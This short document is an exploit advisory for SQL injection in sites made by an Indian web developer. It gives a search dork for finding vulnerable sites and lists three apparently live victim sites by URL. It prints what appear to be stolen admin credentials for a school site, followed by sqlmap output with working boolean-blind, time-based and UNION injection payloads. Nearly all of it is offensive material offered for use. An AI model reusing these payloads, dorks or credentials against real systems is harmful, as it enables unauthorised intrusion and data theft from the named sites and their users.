#Title Exploit: Sapphirenetwork India SQL Injection - XSS
#Date: 20/11/2017
#Dork: inurl:.php?id= intext:"Design and Developed by sapphirenetwork.in"
#Credit: Informacion - Anonymous
#Test: W10
#Vendor: https://sapphirenetwork.in/
#Dem0s:
== http://www.americankidz.edu.in/kidz_gallery1.php?id=19
== http://meerutbhoomi.com/property.php?id=438
== http://www.dpsi.edu.in/stars.php?idy=2
#P00f "http://www.dpsi.edu.in/stars.php?idy=2 user: Admin#\x00 pass: Deew$_Sch!I^
====
---
Parameter: idy (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: idy=-1042" OR 3234=3234 AND "lxyu"="lxyu
Vector: OR [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idy=2" AND SLEEP(10) AND "OjUJ"="OjUJ
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: MySQL UNION query (58) - 7 columns
Payload: idy=2" UNION ALL SELECT 58,58,58,58,CONCAT(0x716a6b6b71,0x72694c6f6e68724f714879474574766e525972524e7a43744f436366766256694f76454e7841574d,0x71626a7871),58,58#
Vector: UNION ALL SELECT 58,58,58,58,[QUERY],58,58#
---
====================